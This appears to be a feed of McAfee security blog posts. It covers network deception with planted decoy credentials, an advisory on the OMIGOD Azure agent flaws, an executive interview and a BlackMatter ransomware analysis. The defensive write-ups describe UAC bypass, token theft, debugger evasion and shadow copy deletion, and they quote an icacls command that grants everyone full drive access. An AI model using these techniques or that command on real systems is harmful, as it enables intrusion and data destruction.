Network Deception is one such deployment within the domain environment where, using the MITRE Shield techniques like decoy systems and network, decoy credentials, decoy accounts, decoy contents, could potentially help detect lateral movement early in the adversary’s attack path to the target asset and at the same time, report significantly low false detection rates. The idea of deception originates from the decades old honeypot systems but, unlike those, relies more on forging trust and giving adversaries what they are looking for. With its inbuilt proactiveness it is configured to lure attackers towards deceptive systems. As shown in the figure below, Network Deception consists of authentic looking decoy systems placed within the domain network, specifically in the network where the critical assets are placed. These decoy systems (could be virtual machines) are the full-fledged OS with configured applications or services and could be replicating the crucial services like Domain Controller, Exchange or DB server and other decoy machines that could lead to those systems. The image below highlights the key foundational aspects of the Network Deception

Figure 17 – Network Deception

Key Aspects of Network Deception

As visualized in the figure above, Network Deception comprises the following key basic facts with respect to the deployment in the domain joined environment:

  • As a part of deployment, decoy/deceptive machines are planted within the network alongside production systems and critical assets. These decoy systems could be real systems or virtual systems with production grade operating systems with the required setup to make them blend well with real systems.
  • As one of the key aspects, deceptive machines are configured to lure attackers towards the decoy services instead of the production services, thereby deflecting or misleading the attacker’s lateral movement path to the target asset.
  • Many of the decoy machines could replicate critical services like Domain Controller, DB servers, Exchange/SharePoint servers and other critical services or applications within the data center.
  • Any legitimate domain user should not be generating traffic to or communicating with the configured decoy machines unless there are some misconfigurations in the network, which need to be corrected.

Basic Decoy Network Setup

Since credential theft plays an important role in a successful targeted attack, deception essentially focuses on planting fake credentials on the production and decoy endpoints at multiple places within the OS and monitoring the use of these credentials to pivot to other systems. With respect to the network setup, the following are the key aspects, however this list is not exhaustive, and much more could be added:

  • Replicating critical network assets and services with decoy machines: Replicating critical network services like Active Directory, DB services, etc., will make more sense since these are the most targeted systems in the network. The decoy Active Directory should be configured with deceptive AD objects (users, groups, SPNs, etc.). with deceptive contents for other replicated services.
  • Planting authentic looking decoy machines in the production network: As indicated earlier, these decoy machines could be real or virtual machines with the production grade OS placed alongside production systems in the critical infrastructure to blend in well. These decoy machines should be joined to the decoy AD and configured with deceptive user accounts to monitor successful logon attempts to the systems.
  • Injecting deceptive credentials on production endpoints: Production endpoints should be injected with deceptive credentials at multiple places like LSASS process memory, Credential Manager, browser credentials, etc., to increase the possibility of these credentials being picked up and used to pivot to decoy systems in the network. These endpoints could be public facing machines or their replicas as well.
  • Decoy Machine runs client applications pointing to decoy services: Decoy machines may run the client with deceptive credentials and configured to point to the decoy services. These could be DB/FTP/Email clients and any other replicated decoy services.
  • Mark decoy systems as “NO LANDING ZONE”: One of the key deployment aspects of deception is to mark all the decoy systems and services as “NO LANDING ZONE”, essentially meaning no legitimate domain users should be accessing decoys and any attempts to access these systems should be closely monitored.

Some of the other setup required for effective deployment of deception is as summarized below:

Figure 18 – Deceptive network setup – Basic requirements

Basic Decoy Systems Setup

To detect the use of deceptive credentials, setting up decoy machines is an essential part of the solution as well. Primarily, decoy machines should enable the access attackers are looking to have during the lateral movement phase. Decoys should also be configured to enable relevant auditing services to be able to generate events. For instance, the following enables the account logon events to be audited:

Decoy machines must be setup to run the log collector agent that can collect the access logs generated and forward them to the correlation server. However, in the domain joined environment, it is also essential to tune the decoy machines to forward only the relevant logs to the correlation server to minimize false positives.

The below highlights some of the auditing required to be enabled on the decoy systems for effective correlation.

Figure 19 – Basic decoy setup

Illustrating and Achieving Network Deception

The following sections describe some examples of how deception can be achieved in the domain network, along with a visualization of how credential theft can be detected.

Network Deception – Example 1: Injecting NETONLY credentials into LSASS process memory

LSASS process memory is one of the prime targets for attackers, as well as malware armed with lateral movement capabilities since it caches a variety of credentials. Credential extraction from the LSASS process requires opening a read handle to the process itself which is closely monitored by EDR products but there are stealthier ways around it.

One of the primary tasks towards achieving credential-based deception is to stage the deceptive credentials in LSASS process memory. This can be accomplished on the production and decoy systems by executing a trivial credential injection code which uses the CreateProcessWithLogonW Windows API with the specified crafted credentials. CreateProcessWithLogonW creates the new logon session using the caller process access token and spawns the process specified as a parameter in the security context of the specified deceptive credentials and it will be staged in the LSASS memory until the process runs in the background. The below shows the example code calling the API with the specified credentials which is also visible when credentials are extracted with Mimikatz.

Figure 20 – Injecting credentials into LSASS memory

One of the parameters to CreateProcessWithLogonW is “dwLogonFlags” which should be specified as LOGON_NETCREDENTIALS_ONLY as shown in the code above. This ensures the specified credentials are used only on the network and not for local logons. Additionally, NETONLY credentials used to create a logon session are not validated by the system. Below is a code snapshot from credential extraction tool Mimikatz, using a similar approach to forge a logon session and replacing the credentials with the supplied ones while executing Pass-the-Hash attacks.

Figure 21 – Mimikatz code for PTH attack

Network Deception – Example 2: Configure deceptive hostnames for decoy VMs

Attackers or malware moving laterally inside the network might do a recon for interesting hostnames via nbtstat/nbtscan. To deflect the lateral movement path, decoy systems can be configured with real looking hostnames that match the production systems. These hostnames will then be visible on NetBIOS scans as shown below.

Figure 22 – Deceptive host names pointing to decoy machines

These decoy systems can also run the relevant client applications pointing to the decoy services, with authentication directed to the decoy Domain Controller in the network. Detection of this attack path happens much earlier, however the decoy network setup keeps the adversaries engaged, helping admins to study their Tools and Techniques.

Figure 23 – Decoy machines running clients pointing to decoy services

A similar deception setup can also be done for the browsers where saved credentials can point to the decoy applications and services within the domain. For instance, Chrome saves the credentials in the SQLite format on the disk which can be decrypted using DPAPI as discussed earlier sections. The below examples demonstrate deceptive browser credentials which can lure adversaries towards the decoy services.

Figure 24 – Inserting deceptive browser credentials

In addition to some of the techniques discussed above, and many others highlighted in the previous sections, setting up deception involves much more advanced configuration of decoy systems to minimize false positives and needs to be tuned to the environment to accurately identify malicious activities. Deception can also be configured to address multiple other phases of lateral movement activity including reconnaissance and target discovery, essentially redirecting the adversaries and giving them a path to the target. Below is a high-level visualization of how the decoy network can look like the domain environment.

Figure 25 – Deception network setup

On the occasion where one of the domain-joined or public facing systems is compromised, authentication would be attempted to other domain joined systems in the network. If an authentication is attempted and any of the decoy systems are accessed and logged on, the use of these planted deceptive credentials should be a red flag and something which must be investigated. The visualization below shows the flow and an event being sent to an administrator on accessing one of the decoy systems.

Figure 26 – Deceptive credentials usage for authentication in the domain

One such example event of successfully logging on to the decoy system is as shown below:

Figure 27 – Alert send to administrator on using deceptive credentials

MITRE ATT&CK Techniques:

Credential theft attacks discussed here are mapped by MITRE as below:

Technique ID Technique Name Description
T1003.001 LSASS Process Memory Attackers may attempt to access LSASS process memory to extract credentials as it stores a variety of credentials. Administrative privileges are required to access the process memory.
T1003.002 SAM Database Accessing credentials from SAM database requires SYSTEM level privileges. Stores credentials for all the local user accounts on the machine.
T1003.003 NTDS.dit file Contains credentials for all the domain users. File is present on the DC and domain admin privileges are required to access this file.
T1003.006 DCSync Attacker can extract the credentials from the DC by impersonating the domain controller and use DRSUAPI protocol to replicate credentials from DC.
T1558.001 Golden Ticket Attackers acquiring credentials for KRBTGT account can forge the Kerberos ticket called Golden Ticket, allowing them to get unrestricted access to any system in the domain
T1558.002 Silver Ticket Allows attacker to get admin level access to the service accounts by abusing Kerberos authentication
T1558.003 Kerberoasting Allows attackers to extract the Kerberos tickets for service accounts from memory and brute force offline to get credentials


As credential theft attacks play a significant role in an attacker’s lateral movement, so as in-network defense for the defenders. With attackers’ lateral movement tactics evolving and getting more stealthier, defenders will have to adapt to innovative ways of defending the critical network assets. In–network defense strategies like Deception could prove to be a promising and forward-looking approach towards detecting and mitigating data theft attacks. Strategic planting of decoy systems within the production network, inserting decoy credentials and decoy contents on calculative selection of endpoints and decoy systems and accurately setting up the logging and correlation via SIEMs for monitoring the use of decoy contents, could certainly detect and mitigate the attacks early in the lateral movement life cycle.

Endpoint solutions like User Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) could also play a significant role in building the deception infrastructure. For instance, one of the ways UEBA solutions could prove useful is to baseline user behavior and monitor access to credential stores on the system. UEBA/EDR could raise the red flag on injection of forged Kerberos tickets in the memory. This can provide user level visibility to a greater extent when integrated with SIEM, playing a crucial role in mitigating credential theft attacks.

The post Detecting Credential Stealing Attacks Through Active In-Network Defense appeared first on McAfee Blogs.

McAfee Enterprise Defender Blog | OMIGOD Vulnerability Opening the Door to Mirai Botnet Wed, 22 Sep 2021 16:15:12 +0000

This month Microsoft released patches for 86 vulnerabilities. While many of these vulnerabilities are important and should be patched as...

The post McAfee Enterprise Defender Blog | OMIGOD Vulnerability Opening the Door to Mirai Botnet appeared first on McAfee Blogs.


This month Microsoft released patches for 86 vulnerabilities. While many of these vulnerabilities are important and should be patched as soon as possible, there is one critical vulnerability that McAfee Enterprise wants to immediately bring to your attention due to the simplicity of what is required to exploit, and evidence that possible exploitation is already being attempted.

The list of flaws, collectively called OMIGOD, impact a software agent called Open Management Infrastructure that’s automatically deployed in many Azure services –

CVE-2021-38647 (CVSS score: 9.8) – Open Management Infrastructure Remote Code Execution Vulnerability

CVE-2021-38648 (CVSS score: 7.8) – Open Management Infrastructure Elevation of Privilege Vulnerability

CVE-2021-38645 (CVSS score: 7.8) – Open Management Infrastructure Elevation of Privilege Vulnerability

CVE-2021-38649 (CVSS score: 7.0) – Open Management Infrastructure Elevation of Privilege Vulnerability

Azure customers on Linux machines, including users of Azure Automation, Azure Automatic Update, Azure Operations Management Suite (OMS), Azure Log Analytics, Azure Configuration Management, and Azure Diagnostics, are at risk of potential exploitation. OMI can also be installed outside of Azure on any on-premises Linux system.

The Remote Code Execution is extremely simple and all that is required is to remove the auth header and root access is available remotely on all machines. With this vulnerability the attackers can obtain initial access to the target Azure environment and then move laterally within it.

Campaign: Multiple CVE’s Affecting the Azure OMI Agent Dubbed OMIGOD

Source: MVISION Insights

Multiple security researchers shared proof of concept attacks on the exploitation of the vulnerabilities and, soon thereafter, actors mimicked the efforts and have recently been seen actively exploiting CVE-2021-38647 via botnet activities.

Background on the Mirai Botnet and related campaigns

Source: MVISION Insights

One such botnet is Mirai, which is actively scanning for vulnerabilities, including those identified as OMIGOD, that will allow the operators to infect a system and spread to connected devices. If the Mirai botnet exploits a vulnerable machine, the operators will drop one of the Mirai DDoS botnet versions and close port 5896 on the internet to prevent other attackers from exploiting the same box. Reports of successful exploitation of OMIGOD have reported cryptominers being deployed on the impacted systems.

McAfee Enterprise Coverage and Recommended Mitigations

Microsoft does not have an auto update mechanism; a manual upgrade of the agents is required to prevent exploitation. Microsoft has released a patched OMI version (, suggested steps by Microsoft are provided in the below link.

CVE-2021-38647 – Open Management Infrastructure Remote Code Execution Vulnerability

McAfee Enterprise will continue to update the following KB document with product coverage of CVE-2021-38647; please subscribe to the KB to be notified of updates.

McAfee Enterprise coverage for CVE-2021-38647 Remote Code Execution Vulnerability

Identifying Vulnerable Systems with the OMI Agent

To identify vulnerable systems in your environment, McAfee Enterprise recommends scanning for systems listening on Ports 5986. Port 5986 is the typical port leveraged by the OMI agent. Industry intelligence from the Wiz Research group is also noting vulnerable systems listening on non–default ports 5985 and 1270. It is recommended to limit network access to those ports immediately to protect from the RCE vulnerability.

Detecting Threat Activity with MVISION Insights

MVISION Insights provides regularly updated threat intelligence for the ongoing attempts to exploit OMIGOD. The “Multiple CVE’s Affecting the Azure OMI Agent Dubbed OMIGOD” campaign will have up to date Global Prevalence, IOCs, and MITRE techniques being observed in the wild. The IOCs within MVISION Insights can be utilized by the Real-time Search function of MVISION Endpoint Detection & Response (EDR) to proactively search your entire Linux endpoint environment for detection.

Global Prevalence of OMIGOD Exploitation Source: MVISION Insights

Indicators of Compromise related to exploitation of OMIGOD Source: MVISION Insights

Blocking Ports with McAfee ENS Firewall

The McAfee ENS Firewall Rules will allow for the creation of custom rules to block specific ports until the OMI agent can be updated to the resolved version; please see the below screenshot for a sample rule to block the ports associated with the OMI agent.

Creation of Block Rule for OMI Agent Ports in McAfee ENS Firewall

Locating Systems Running OMI with MVISION EDR

The Real-time search feature in MVISION EDR with allow for the searching of your entire Linux environment utilizing several different parameters to identify systems that could be potential targets.

The below pre-built queries can be executed to locate systems listening on the noted ports for the OMI Agent and to verify the version of the OMI agent installed on your endpoint.

Processes and CurrentFlow and HostInfo hostname where Processes name equals omiengine

Software and HostInfo hostname where Software displayname contains om

Locating Installed Software Versions of OMI on Linux endpoints in MVISION EDR

Monitoring the traffic and user information of OMI in MVISION EDR

Discovery of Vulnerabilities and Configuration Audits with MVISION CNAPP

Another method to identify vulnerable systems in your cloud infrastructure is run an on-demand vulnerability scan and create security configuration audits with MVISION Cloud Native Application Protection Platform (CNAPP). Please see below several examples of using the CWPP and CSPM features to locate vulnerable systems by CVE number and detect usage of the “root” account in Microsoft Azure.

Running Vulnerability Scans to Identify Vulnerable Systems by CVE

Setting Security Configuration Audits to be alerted of Root Access in Microsoft Azure

The post McAfee Enterprise Defender Blog | OMIGOD Vulnerability Opening the Door to Mirai Botnet appeared first on McAfee Blogs.

Executive Spotlight: Q&A with Lead Scientist & Sr. Principal Engineer, Christiaan Beek Wed, 22 Sep 2021 15:00:17 +0000

Welcome back to our executive blog series, where I chat with some of the pivotal players behind McAfee Enterprise and the Advanced...

The post Executive Spotlight: Q&A with Lead Scientist & Sr. Principal Engineer, Christiaan Beek appeared first on McAfee Blogs.


Welcome back to our executive blog series, where I chat with some of the pivotal players behind McAfee Enterprise and the Advanced Threat Research Team to hear their takes on today’s security trends, challenges, and opportunities for companies across the globe.

Q: What got you interested in technology and threat research?

As a little kid, I was always fascinated by technology. I would wrench open devices to study the inner workings, and try to assemble again. At age 12 I worked for three years to assemble my first computer-setup: a Commodore 64, disk-drive, and printer followed by an Amiga with modem. From that point, it was a journey from sysadmin to ethical hacking into specializing in digital forensics and joining FoundStone to setup their EMEA Incident Response team. As I witnessed multiple malware incidents and later some of the largest cyber-attacks ever, I got fascinated by all the mechanics around threat research. From this, I made a move to lead and envision new ways (threat) research can assist both responders and customers.

Q: If you could relive any moment of your life, which would it be?

Good question. There are so many moments to be thankful for that I cannot choose one but will mention a few that might sound obvious: My baptism, marrying my wife, and the birth of my kids.

Q: What are some of the trends you are currently noticing across the threat landscape?

Of course, we still have ransomware around as an ongoing issue that keeps evolving and impacting not only companies around the world, but also our lives more and more when fuel is not available, supermarkets are closed, and delivery of goods cannot be executed. Secondly, I would say the volume and number of attacks that happen have increased dramatically over the years. The moment a vulnerability is announced, within days, a proof-of-concept is available and within a week it is used by adversaries (either cybercrime or nation-state motivated). The feedback from our customers has been tremendously positive.

Q: How do you react to constantly changing threats in the market?

The only way to respond to the constant changing threats is to be flexible and willing to change. What works today might not work tomorrow, which should be part of your strategy when it comes to threat hunting, threat detection, and protection. My team is eager to learn and we are committed to protect our customers, innovate new research techniques, and adapt that into our technology.

The post Executive Spotlight: Q&A with Lead Scientist & Sr. Principal Engineer, Christiaan Beek appeared first on McAfee Blogs.

BlackMatter Ransomware Analysis; The Dark Side Returns Wed, 22 Sep 2021 14:54:36 +0000

BlackMatter is a new ransomware threat discovered at the end of July 2021. This malware started with a strong group...

The post BlackMatter Ransomware Analysis; The Dark Side Returns appeared first on McAfee Blogs.


BlackMatter is a new ransomware threat discovered at the end of July 2021.

This malware started with a strong group of attacks and some advertising from its developers that claims they take the best parts of other malware, such as GandCrab, LockBit and DarkSide, despite also saying they are a new group of developers. We at McAfee Enterprise Advanced Threat Research (ATR), have serious doubts about this last statement as analysis shows the malware has a great deal in common with DarkSide, the malware associated with the Colonial Pipeline attack which caught the attention of the US government and law enforcement agencies around the world.

The main goal of BlackMatter is to encrypt files in the infected computer and demand a ransom for decrypting them. As with previous ransomware, the operators steal files and private information from compromised servers and request an additional ransom to not publish on the internet.


McAfee’s EPP solution covers BlackMatter ransomware with an array of prevention and detection techniques.

ENS ATP provides behavioral content focusing on proactively detecting the threat while also delivering known IoCs for both online and offline detections. For DAT based detections, the family will be reported as Ransom-BlackMatter!<hash>. ENS ATP adds 2 additional layers of protection thanks to JTI rules that provide attack surface reduction for generic ransomware behaviors and RealProtect (static and dynamic) with ML models targeting ransomware threats.

Updates on indicators are pushed through GTI, and customers of Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.


BlackMatter is typically seen as an EXE program and, in special cases, as a DLL (Dynamic Library) for Windows. Linux machines can be affected with special versions of it too but in this report, we will only be covering the Windows version.

This report will focus on version 1.2 of BlackMatter while also noting the important changes in the current version, 2.0.

BlackMatter is programmed in C++ and has a size of 67Kb.

FIGURE 1. Information about the malware

The compile date of this sample is the 23rd of July 2021. While these dates can be altered, we think it is correct; version 1.9 has a compile time of 12 August 2021 and the latest version, 2.0, has a date four days later, on the 16th of August 2021. Is clear that the malware developers are actively improving the code and making detection and analysis harder.

The first action performed by BlackMatter is preparation of some modules that will be needed later to get the required functions of Windows.

FIGURE 2. BlackMatter searching for functions

BlackMatter uses some tricks to try and make analysis harder and avoid debuggers. Instead of searching for module names it will check for hashes precalculated with a ROT13 algorithm. The modules needed are “kernel32.dll” and “ntdll.dll”. Both modules will try to get functions to reserve memory in the process heap. The APIs are searched using a combination of the PEB (Process Environment Block) of the module and the EAT (Export Table Address) and enumerating all function names. With these names it will calculate the custom hash and check against the target hashes.

FIGURE 3. BlackMatter detecting a debugger

At this point BlackMatter will make a special code to detect debuggers, checking the last 2 “DWORDS” after the memory is reserved, searching for the bytes “0xABABABAB”. These bytes always exist when a process reserves memory in the heap and, if the heap has one special flag (that by default is set when a process is in a debugger), the malware will avoid saving the pointer to the memory reserved so, in this case, the variables will keep a null pointer.

In Windows operating systems the memory has different conditions based on whether a program is running in normal mode (as usual) or in debugging mode (a mode used by programmers, for example). In this case, when the memory is reserved to keep information, if it is in debugging mode, Windows will mark the end of this memory with a special value, “0xABABABAB”. BlackMatter checks for this value and, if found, the debugger is detected. To avoid having it run normally it will destroy the function address that it gets before, meaning it will crash, thus avoiding the execution.

FIGURE 4. Preparing the protection stub function

After this check it will create a special stub in the reserved memory which is very simple but effective in making analysis harder as the stub will need to be executed to see which function is called and executed.

This procedure will be done with all functions that will be needed; the hashes are saved hardcoded in the middle of the “.text” section in little structs as data. The end of each struct will be recognized by a check against the “0xCCCCCCCC” value.

FIGURE 5. Hashes of the functions needed

This behavior highlights that the BlackMatter developers know some tricks to make analysis harder, though it is simple to defeat both by patching the binary.

After this, the ransomware will use another trick to avoid the use of debuggers. BlackMatter will call the function “ZwSetInformationThread” with the class argument of 0x11 which will hide the calling thread from the debuggers.

If the malware executes it correctly and a debugger is attached, the debugging session will finish immediately. This code is executed later in the threads that will be used to encrypt files.

FIGURE 6. Another way to detect a debugger

The next action is to check if the user that launched the process belongs to the local group of Administrators in the machine using the function “SHTestTokenMembership”. In the case that the user belongs to the administrator group the code will continue normally but in other cases it will get the operating system version using the PEB (to avoid using API functions that can alter the version) and, if it is available, will open the process and check the token to see if that belongs to the Administrators group.

FIGURE 7. BlackMatter checking if it has administrator rights

In the case that the user does not belong to the Administrator group the process token will use a clever trick to escalate privileges.

The first action is to prepare the string “dllhost.exe” and enumerate all modules loaded. For each module it will check one field in the initial structure that all executables have that keeps the base memory address where it will be loaded (for example, kernel32.dll in 0x7fff0000) and will compare with its own base address. If it is equal, it will change its name in the PEB fields and the path and arguments path to “dllhost.exe” (in the case of the path and argument path to the SYSTEM32 folder, where the legitimate “dllhost.exe” exists). This trick is used to try and mislead the user. For each module found it will check the base address of the module with its own base address and, at that moment, will change the name of the module loaded, the path, and arguments to mislead the user.

FIGURE 8. Decryption of the string “dllhost.exe”

The process name will be “dllhost.exe” and the path will be the system directory of the victim machine. This trick, besides not changing the name of the process in the TaskManager, can make a debugger “think” that another binary is loaded and remove all breakpoints (depending on the debugger used).

FIGURE 9. Changing the name and path in the PEB

The second action is to use one exploit using COM (Component Object Model) objects to try to elevate privileges before finishing its own instance using the “Terminate Process” function.

For detection, the module uses an undocumented function from NTDLL.DLL, “LoadedModulesLdrCallback” that lets the programmer set a function as a callback where it can get the arguments and check the PEB. In this callback the malware will set the new Unicode strings using “RtlInitUnicodeString”; the strings are the path to “dllhost.exe” in the system folder and “dllhost.exe” as the image name.

The exploit used to bypass the UAC (User Access Control), which is public, uses the COM interface of CMSTPLUA and the COM Elevation Moniker.

In the case that it has administrator rights or uses the exploit with success, it will continue making the new extension that will be used with the encrypted files. For this task it will read the registry key of “Machine Guid” in the cryptographic key (HKEY LOCAL MACHINE).

This entry and value exist in all versions of Windows and is unique for the machine; with this value it will make a custom hash and get the final string of nine characters.

FIGURE 10. Creating the new extension for the encrypted files

Next, the malware will create the ransom note name and calculate the integrity hash of it. The ransom note text is stored encrypted in the malware data. Usually the ransom note name is “%s.README.txt”, where the wildcard is filled with the new extension generated previously.

The next step is to get privileges that will be needed later; BlackMatter tries to get many privileges:














FIGURE 11. Setting special privileges

After getting the privileges it will check if it has SYSTEM privileges, checking the token of its own process. If it is SYSTEM, it will get the appropriate user for logon with the function “WTSQueryUserToken”. This function only can be used if the caller has “SeTcbPrivilege” that, by default, only SYSTEM has.

FIGURE 12. Obtaining the token of the logged on user

After getting the token of the logged on user the malware will open the Windows station and desktop.

In the case that it does not have SYSTEM permissions it will enumerate all processes in the system and try to duplicate the token from “explorer.exe” (the name is checked using a hardcoded hash), if it has rights it will continue normally, otherwise it will check again if the token that was duplicated has administrator rights.

In this case it will continue normally but in other cases it will check the operating system version and the CPU (Central Processing Unit) mode (32- or 64- bits). This check is done using the function “ZwQueryInformationProcess” with the class 0x1A (ProcessWow64Information).

FIGURE 13. Checking if the operating system is 32- or 64-bits

In the case that the system is 32-bits it will decrypt one little shellcode that will inject in one process that will enumerate using the typical “CreateRemoteThread” function. This shellcode will be used to get the token of the process and elevate privileges.

In the case that the system is 64-bits it will decrypt two different shellcodes and will execute the first one that gets the second shellcode as an argument.

FIGURE 14. BlackMatter preparing shellcodes to steal system token

These shellcodes will allow BlackMatter to elevate privileges in a clean way.

Is important to understand that to get the SYSTEM token BlackMatter will enumerate the processes and get “svchost.exe”, but not only will it check the name of the process, it will also check that the process has the privilege “SeTcbPrivilege”. As only SYSTEM has it by default (and it is one permission that cannot be removed from this “user”) it will be that this process is running under SYSTEM and so it becomes the perfect target to attack with the shellcodes and steal the token that will be duplicated and set for BlackMatter.

FIGURE 15. Checking if the target process is SYSTEM

After this it will decrypt the configuration that it has embedded in one section. BlackMatter has this configuration encrypted and encoded in base64.

This configuration has a remarkably similar structure to Darkside, offering another clear hint that the developers are one and the same, despite their claims to the contrary.

After decryption, the configuration can get this information:

  • RSA Key used to protect the Salsa20 keys used to encrypt the files.
  • A 16-byte hex value that remarks the victim id.
  • A 16-byte hex value that is the AES key that will be used to encrypt the information that will be sent to the C2.
  • An 8/9-byte array with the behavior flags to control the ransomware behavior.
  • A special array of DWORDs (values of 4 bytes each one) that keep the values to reach the critical points in the configuration.
  • Different blocks encoded and, sometimes, encrypted again to offer the field more protection.


After getting the configuration and parsing it, BlackMatter will start checking if it needs to make a login with some user that is in the configuration. In this case it will use the function “LogonUser” with the information of the user(s) that are kept in the configuration; this information has one user and one password: “” where “test” is the user, “” is the domain and “12345” the password.

The next action will be to check with the flag to see if a mutex needs to be created to avoid having multiple instances.

This mutex is unique per machine and is based in the registry entry “MachineGuid” in the key “Cryptography”. If the system has this mutex already the malware will finish itself.

Making a vaccine with a mutex can sometimes be useful but not in this case as the developers change the algorithm and only need to set the flag to false to avoid creating it.

FIGURE 16. Creation of the mutex to avoid multiple instances

After, it will check if it needs to send information to the C2. If it does (usually, but not always) it will get information of the victim machine, such as username, computer name, size of the hard disks, and other information that is useful to the malware developers to know how many machines are infected.

This information is encoded with base64 and encrypted with AES using the key in the configuration.

FIGURE 17. Encrypted information sent to the C2

The C2 addresses are in the configuration (but not all samples have them, in this case the flag to send is false). The malware will try to connect to the C2 using a normal protocol or will use SSL checking the initial “http” of the string.

FIGURE 18. Get information of the victim machine and user

The information is prepared in some strings decrypted from the malware and sent in a POST message.

FIGURE 19. Choose to send by HTTP or HTTPS

The message has values to mislead checks and to try and hide the true information as garbage. This “fake” data is calculated randomly.

The C2 returns garbage data but the malware will check if it starts and ends with the characters “{“  and “}”; if it does the malware will ignore sending the information to another C2.

FIGURE 20. Checking for a reply from the C2 after sending

BlackMatter is a multithread application and the procedure to send data to the C2 is done by a secondary thread.

After that, BlackMatter will enumerate all units that are FIXED and REMOVABLE to destroy the recycle bin contents. The malware makes it for each unit that has it and are the correct type. One difference with DarkSide is that it has a flag for this behavior while  BlackMatter does not.

The next action is to delete the shadow volumes using COM to try and avoid detection using the normal programs to manage the shadow volumes. This differs with DarkSide that has a flag for this purpose.

FIGURE 21. Destruction of the shadow volumes using COM

BlackMatter will check another flag and will enumerate all services based on one list in the configuration and will stop target services and delete them.

This behavior is the same as DarkSide.

FIGURE 22. Stopping services and deleting them

Processes will be checked and terminated as with DarkSide, based on other configuration flags.

After terminating the processes BlackMatter will stop the threads from entering suspension or hibernating if someone is using the computer to prevent either of those outcomes occurring when it is encrypting files. This is done using the function “ZwSetThreadExecutionState”.

FIGURE 23. Preventing the machine being suspended or hibernated

The next action will be to enumerate all units, fixed and on the network, and create threads to encrypt the files. BlackMatter uses Salsa20 to encrypt some part of the file and will save a new block in the end of the file, protected with the RSA key embedded in the configuration with the Salsa20 keys used to encrypt it. This makes BlackMatter slower than many other ransomwares.

After the encryption it will send to the C2 all information about the encryption process, how many files were crypted, how many files failed, and so on. This information is sent in the manner previously described, but only if the config is set to true.

FIGURE 24. Release of the mutex

If one mutex was created in this moment it will be released. Later it will check the way that the machine boots with the function “GetSystemMetrics”. If the boot was done in Safe Mode BlackMatter will set some keys for persistence in the registry for the next reboot and then attack the system, changing the desktop wallpaper.

FIGURE 25. Determining whether the system boots in safe mode or normal mode

Of course, it will disable the safeboot options in the machine and reboot it (it is one of the reasons why it needs the privilege of shutdown).

To ensure it can launch in safe mode, the persistence key value with the path of the malware will start with a ‘*’.

FIGURE 26. Setting the persistance registry key

If the machine starts in the normal way, it will change the desktop wallpaper with an alternative generated in runtime with some text about the ransom note.

FIGURE 27. BlackMatter makes the new wallpaper in runtime


The new versions have some differences compared with versions 1.2 to 1.6:

  • Changes in the stub generation code. Previously only one type of stub was used, but in more recent versions several types of stubs are employed, with one chosen randomly per function. Anyways the stubs can be removed without any problem by patching the binary.
  • A new byte flag in the configuration that remarks if it needs to print the ransom note using the available printer in the system. Very similar to Ryuk but instead BlackMatter uses APIs from “winspool.drv”.
  • Removed one C2 domain that was shut down by the provider.

Additional changes in version 2.0:

  • This version changes the crypto algorithm to protect the configuration making it more complex to decrypt it.
  • Removed the last C2 that was shut down by the provider.
  • Added a new C2 domain.

These changes suggest the developers are active on social media, with an interest in malware and security researchers.


Unlike some ransomware we’ve seen in the past, such as GandCrab , BlackMatter has good code, but it does have some design flaws that can be used in some cases to avoid having the malware encrypt the files.

This vaccine is not intended to be used in the normal way, rather only in special cases as, while it works, other programs can be affected (we obviously cannot test all third party programs but potential issues are likely to include data corruption and unpredictable behavior), and the fix is not permanent.

Steps to make the vaccine (proceed at your own risk):

  • Open regedit (or another registry editor) and go to the key in HKEY_LOCAL_MACHINE> Cryptography.
  • In this key can be seen a string value named “MachineGuid” with a special value. This value is unique for the machine and is used for some applications to identify the machine. BlackMatter uses it to make the mutex and, very importantly, the new extension for the encrypted files.
  • Make a new value of type string with a random name and put the same value as seen in “MachineGuid” to have a backup of it.
  • Remove the “MachineGuid” value, and then make it again but with the binary type Instead of string type, with the same name, “MachineGuid”.
  • Close the registry editor.

In this moment BlackMatter cannot affect the machine as it needs the registry key to make the ransom extension, and the most important thing is, if it cannot make it, it will return the function WITHOUT decrypting the config that is needed too. In this case it will destroy the recycle bin and shadow volumes anyways but later it will finish as it does not have any behavior to do, RSA Key to protect the files, or anything to send to the C2 as the flag was never read from the config (and the default values are false for all of them).

Though the behavior of other programs may be unpredictable, the vaccine is easy to make, and the system will boot, showing that the BlackMatter programmers made a mistake in the design of the code.

This vaccine works for all versions, including 2.0.


The sample uses the following MITRE ATT&CK™ techniques:

Technique ID Technique Description Observable
T1134 Access Token Manipulation BlackMatter accesses and manipulates different process tokens.
T1486 Data Encrypted for Impact BlackMatter encrypts files using a custom Salsa20 algorithm and RSA.
T1083 File and Directory Discovery


BlackMatter uses native functions to enumerate files and directories searching for targets to encrypt.
T1222.001 Windows File and Directory Permissions Modification BlackMatter executes the command icacls “<DriveLetter>:\*” /grant Everyone: F /T /C /Q to grant full access to the drive.
T1562.001 Disable or Modify Tools BlackMatter stops services related to endpoint security software.
T1106 Native API BlackMatter uses native API functions in all code.
T1057 Process Discovery BlackMatter enumerates all processes to try to discover security programs and terminate them.
T1489 Service Stop BlackMatter stops services.
T1497.001 System Checks BlackMatter tries to detect debuggers, checking the memory reserved in the heap.
T1135 Network Share Discovery BlackMatter will attempt to discover network shares by building a UNC path in the following format for each driver letter, from A to Z: \\<IP>\<drive letter>$
T1082 System Information Discovery BlackMatter uses functions to retrieve information about the target system.
T1592 Gather Victim Host Information BlackMatter retrieves information about the user and machine.
T1070 Valid Accounts BlackMatter uses valid accounts to logon to the victim network.
T1547 Boot or Logon Autostart Execution BlackMatter installs persistence in the registry.
T1102 Query Registry BlackMatter queries the registry for information.
T1018 Remote System Discovery BlackMatter enumerates remote machines in the domain.
T1112 Modify Registry BlackMatter changes registry keys and values and sets new ones.


BlackMatter is a new threat in the ransomware field and its developers know full well how to use it to attack their targets. The coding style is remarkably similar to DarkSide and, in our opinion, the people behind it are either the same or have a very close relationship.

BlackMatter shares a lot of ideas, and to some degree code, with DarkSide:

  • Configurations are remarkably similar, especially with the last version of Darkside, besides the change in the algorithm to protect it which, despite having less options, remains with the same structure. We do not think that the developers of BlackMatter achieved this similarity by reversing DarkSide as that level of coding skill would have allowed them to create an entirely new ransomware from the ground up. Also, the idea that the DarkSide developers gave or sold the original code to them does not make any sense as it is an old product.
  • Dynamic functions are used in a similar way to DarkSide.
  • It uses the same compression algorithm for the configuration.
  • The victim id is kept in the same way as DarkSide.

